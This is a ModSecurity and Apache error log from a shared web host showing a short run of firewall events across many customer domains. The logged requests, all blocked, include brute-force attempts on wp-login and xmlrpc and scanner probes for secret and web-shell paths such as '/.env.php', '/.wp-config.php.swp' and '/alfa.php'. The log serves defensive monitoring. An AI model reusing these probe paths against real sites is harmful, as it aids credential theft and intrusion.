[Tue May 26 13:31:30.631135 2026] [security2:error] [pid 512344:tid 512573] [client 178.20.210.57:43658] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVTWsbElyei4S77DQcKvgAAY0I"]
[Tue May 26 13:31:31.082829 2026] [security2:error] [pid 512745:tid 512907] [client 104.28.37.61:55216] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahVTWnKSB_s2CvZg7xNywAABKiw"]
[Tue May 26 13:31:31.458380 2026] [security2:error] [pid 512745:tid 512973] [client 108.234.85.141:61914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 141.85.234.108.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "khatucity.com"] [uri "/xmlrpc.php"] [unique_id "ahVTW3KSB_s2CvZg7xNyyQAAAWw"]
[Tue May 26 13:31:31.458553 2026] [security2:error] [pid 512745:tid 512973] [client 108.234.85.141:61914] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "khatucity.com"] [uri "/xmlrpc.php"] [unique_id "ahVTW3KSB_s2CvZg7xNyyQAAAWw"]
[Tue May 26 13:31:32.008122 2026] [security2:error] [pid 512745:tid 512956] [client 104.28.37.61:55216] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahVTW3KSB_s2CvZg7xNy1wABWxk"]
[Tue May 26 13:31:32.149032 2026] [proxy:error] [pid 512745:tid 512904] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:32.149088 2026] [proxy_http:error] [pid 512745:tid 512904] [client 165.227.35.65:41066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcalendars.dassmerchandise.com/
[Tue May 26 13:31:32.149893 2026] [proxy:error] [pid 512745:tid 512904] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:32.149927 2026] [proxy_http:error] [pid 512745:tid 512904] [client 165.227.35.65:41066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcalendars.dassmerchandise.com/
[Tue May 26 13:31:32.500224 2026] [security2:error] [pid 512745:tid 512971] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTXHKSB_s2CvZg7xNy3gAAAWo"]
[Tue May 26 13:31:33.704265 2026] [security2:error] [pid 512745:tid 512862] [remote 123.30.233.13:58848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVTXXKSB_s2CvZg7xNy_gABHXQ"]
[Tue May 26 13:31:34.900735 2026] [security2:error] [pid 512745:tid 512926] [client 207.46.13.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVTXHKSB_s2CvZg7xNy7gAAAT0"]
[Tue May 26 13:31:35.052664 2026] [security2:error] [pid 512745:tid 512890] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTXnKSB_s2CvZg7xNzFgAAARk"]
[Tue May 26 13:31:36.405143 2026] [security2:error] [pid 512745:tid 512880] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTX3KSB_s2CvZg7xNzJwAAAQ8"]
[Tue May 26 13:31:37.274454 2026] [security2:error] [pid 512745:tid 512879] [client 104.28.37.61:55216] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahVTYXKSB_s2CvZg7xNzOQABDgg"]
[Tue May 26 13:31:37.325105 2026] [security2:error] [pid 512745:tid 512775] [remote 45.250.255.226:46848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTYXKSB_s2CvZg7xNzOgABgB0"]
[Tue May 26 13:31:37.933419 2026] [security2:error] [pid 512745:tid 512930] [client 104.28.37.61:55216] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahVTYXKSB_s2CvZg7xNzQAABQS0"]
[Tue May 26 13:31:38.706366 2026] [security2:error] [pid 512745:tid 512941] [client 113.172.60.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTYnKSB_s2CvZg7xNzTgAAAUw"]
[Tue May 26 13:31:38.707083 2026] [security2:error] [pid 512745:tid 512932] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTYnKSB_s2CvZg7xNzSwAAAUM"]
[Tue May 26 13:31:39.401887 2026] [security2:error] [pid 512344:tid 512580] [client 31.57.184.107:57921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.correo.cuatrodoce.com.mx"] [uri "/wp-login.php"] [unique_id "ahVTY8bElyei4S77DQcLLQAAAGo"]
[Tue May 26 13:31:40.918955 2026] [security2:error] [pid 512344:tid 512599] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTZMbElyei4S77DQcLQQAAAH0"]
[Tue May 26 13:31:41.096544 2026] [security2:error] [pid 512745:tid 513001] [client 172.98.32.42:63099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVTZHKSB_s2CvZg7xNzbAAAAYg"]
[Tue May 26 13:31:43.751396 2026] [security2:error] [pid 512344:tid 512498] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTZ8bElyei4S77DQcLbgAAABg"]
[Tue May 26 13:31:45.963333 2026] [security2:error] [pid 512745:tid 512910] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTaXKSB_s2CvZg7xNzmQAAAS0"]
[Tue May 26 13:31:46.818656 2026] [security2:error] [pid 512745:tid 512942] [client 4.228.83.111:64358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVTanKSB_s2CvZg7xNzqQAAAU0"]
[Tue May 26 13:31:46.818800 2026] [security2:error] [pid 512745:tid 512942] [client 4.228.83.111:64358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVTanKSB_s2CvZg7xNzqQAAAU0"]
[Tue May 26 13:31:47.657919 2026] [security2:error] [pid 512745:tid 512948] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTa3KSB_s2CvZg7xNzsgAAAVM"]
[Tue May 26 13:31:49.160591 2026] [security2:error] [pid 512745:tid 512978] [client 85.208.96.212:40166] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVTbXKSB_s2CvZg7xNz0AAAAXE"]
[Tue May 26 13:31:49.160762 2026] [security2:error] [pid 512745:tid 512978] [client 85.208.96.212:40166] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVTbXKSB_s2CvZg7xNz0AAAAXE"]
[Tue May 26 13:31:50.524854 2026] [security2:error] [pid 512745:tid 512904] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTbnKSB_s2CvZg7xNz5QAAASc"]
[Tue May 26 13:31:50.773791 2026] [security2:error] [pid 512745:tid 512956] [client 23.239.177.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVTbnKSB_s2CvZg7xNz4wAAAVs"]
[Tue May 26 13:31:51.414908 2026] [security2:error] [pid 512745:tid 512991] [client 78.47.98.55:63196] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVTb3KSB_s2CvZg7xNz_QAAAX4"], referer: https://thegoodsporting.com
[Tue May 26 13:31:52.109039 2026] [security2:error] [pid 512745:tid 512905] [client 4.228.83.111:37724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahVTcHKSB_s2CvZg7xN0BgAAASg"]
[Tue May 26 13:31:52.109219 2026] [security2:error] [pid 512745:tid 512905] [client 4.228.83.111:37724] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahVTcHKSB_s2CvZg7xN0BgAAASg"]
[Tue May 26 13:31:52.778021 2026] [security2:error] [pid 512344:tid 512525] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTcMbElyei4S77DQcLxQAAADM"]
[Tue May 26 13:31:54.863389 2026] [security2:error] [pid 512344:tid 512575] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTcsbElyei4S77DQcL4QAAAGU"]
[Tue May 26 13:31:54.953435 2026] [security2:error] [pid 512745:tid 512912] [client 142.93.69.125:64458] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVTcnKSB_s2CvZg7xN0MgAAAS8"]
[Tue May 26 13:31:55.670809 2026] [security2:error] [pid 512344:tid 512553] [client 4.228.83.111:64345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/goods.php"] [unique_id "ahVTc8bElyei4S77DQcL7AAAAE8"]
[Tue May 26 13:31:55.670916 2026] [security2:error] [pid 512344:tid 512553] [client 4.228.83.111:64345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/goods.php"] [unique_id "ahVTc8bElyei4S77DQcL7AAAAE8"]
[Tue May 26 13:31:56.765137 2026] [security2:error] [pid 512745:tid 512878] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTdHKSB_s2CvZg7xN0WwAAAQ0"]
[Tue May 26 13:31:58.565300 2026] [security2:error] [pid 512344:tid 512560] [client 74.7.244.39:43550] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.koiralalogistics.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVTdsbElyei4S77DQcMEAAAVkU"]
[Tue May 26 13:31:59.297488 2026] [security2:error] [pid 512344:tid 512481] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTdsbElyei4S77DQcMGAAAAAc"]
[Tue May 26 13:31:59.977808 2026] [security2:error] [pid 512344:tid 512520] [client 4.228.83.111:64349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/public/css.php"] [unique_id "ahVTd8bElyei4S77DQcMKgAAAC4"]
[Tue May 26 13:31:59.977923 2026] [security2:error] [pid 512344:tid 512520] [client 4.228.83.111:64349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/public/css.php"] [unique_id "ahVTd8bElyei4S77DQcMKgAAAC4"]
[Tue May 26 13:32:00.380808 2026] [security2:error] [pid 512745:tid 512994] [client 158.173.20.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTeHKSB_s2CvZg7xN0fwAAAYE"], referer: http://www.anujtradingco.com/
[Tue May 26 13:32:00.810694 2026] [security2:error] [pid 512344:tid 512521] [client 158.173.20.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTeMbElyei4S77DQcMNwAAAC8"], referer: http://www.anujtradingco.com/features/icon-box/
[Tue May 26 13:32:01.238642 2026] [security2:error] [pid 512344:tid 512484] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTeMbElyei4S77DQcMOgAAAAo"]
[Tue May 26 13:32:03.512451 2026] [security2:error] [pid 512344:tid 512586] [client 113.191.206.111:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTe8bElyei4S77DQcMUAAAAHA"]
[Tue May 26 13:32:03.954754 2026] [security2:error] [pid 512745:tid 512958] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTe3KSB_s2CvZg7xN0uAAAAV0"]
[Tue May 26 13:32:05.053050 2026] [security2:error] [pid 512745:tid 512884] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTfHKSB_s2CvZg7xN0xQABEzk"]
[Tue May 26 13:32:05.353207 2026] [security2:error] [pid 512745:tid 512962] [client 4.228.83.111:37727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/alfa.php"] [unique_id "ahVTfXKSB_s2CvZg7xN02gAAAWE"]
[Tue May 26 13:32:05.353298 2026] [security2:error] [pid 512745:tid 512962] [client 4.228.83.111:37727] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/alfa.php"] [unique_id "ahVTfXKSB_s2CvZg7xN02gAAAWE"]
[Tue May 26 13:32:05.589042 2026] [security2:error] [pid 512745:tid 512905] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTfXKSB_s2CvZg7xN01wAAASg"]
[Tue May 26 13:32:07.186939 2026] [security2:error] [pid 512344:tid 512514] [client 158.173.20.109:59016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.20.173.158.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVTfsbElyei4S77DQcMYwAAACg"], referer: https://anujtradingco.com/wp-admin/admin-ajax.php
[Tue May 26 13:32:08.379485 2026] [security2:error] [pid 512745:tid 512943] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTf3KSB_s2CvZg7xN1BwAAAU4"]
[Tue May 26 13:32:10.017457 2026] [security2:error] [pid 512745:tid 512989] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTgXKSB_s2CvZg7xN1HAAAAXw"]
[Tue May 26 13:32:13.207408 2026] [security2:error] [pid 512344:tid 512560] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVThMbElyei4S77DQcMngAAAFY"]
[Tue May 26 13:32:13.522491 2026] [security2:error] [pid 512745:tid 512933] [client 4.228.83.111:45627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/css.php"] [unique_id "ahVThXKSB_s2CvZg7xN1bgAAAUQ"]
[Tue May 26 13:32:13.522633 2026] [security2:error] [pid 512745:tid 512933] [client 4.228.83.111:45627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/css.php"] [unique_id "ahVThXKSB_s2CvZg7xN1bgAAAUQ"]
[Tue May 26 13:32:13.715385 2026] [security2:error] [pid 512745:tid 512840] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVThXKSB_s2CvZg7xN1ggABhl4"]
[Tue May 26 13:32:14.449376 2026] [security2:error] [pid 512745:tid 512816] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.wp-config.php.swp"] [unique_id "ahVThnKSB_s2CvZg7xN12AABfkY"]
[Tue May 26 13:32:14.863996 2026] [security2:error] [pid 512745:tid 512809] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVThnKSB_s2CvZg7xN2DgABIT8"]
[Tue May 26 13:32:15.023036 2026] [security2:error] [pid 512745:tid 512813] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/admin/phpinfo.php"] [unique_id "ahVTh3KSB_s2CvZg7xN2IQABFUM"]
[Tue May 26 13:32:15.058862 2026] [security2:error] [pid 512745:tid 512832] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/admin_phpinfo.php"] [unique_id "ahVTh3KSB_s2CvZg7xN2JgABMFY"]
[Tue May 26 13:32:15.096077 2026] [security2:error] [pid 512344:tid 512513] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVThsbElyei4S77DQcMtAAAACc"]
[Tue May 26 13:32:15.220545 2026] [security2:error] [pid 512745:tid 512747] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/api/info.php"] [unique_id "ahVTh3KSB_s2CvZg7xN2OAABMAE"]
[Tue May 26 13:32:15.281125 2026] [security2:error] [pid 512745:tid 512831] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/api/phpinfo.php"] [unique_id "ahVTh3KSB_s2CvZg7xN2QAABMFU"]
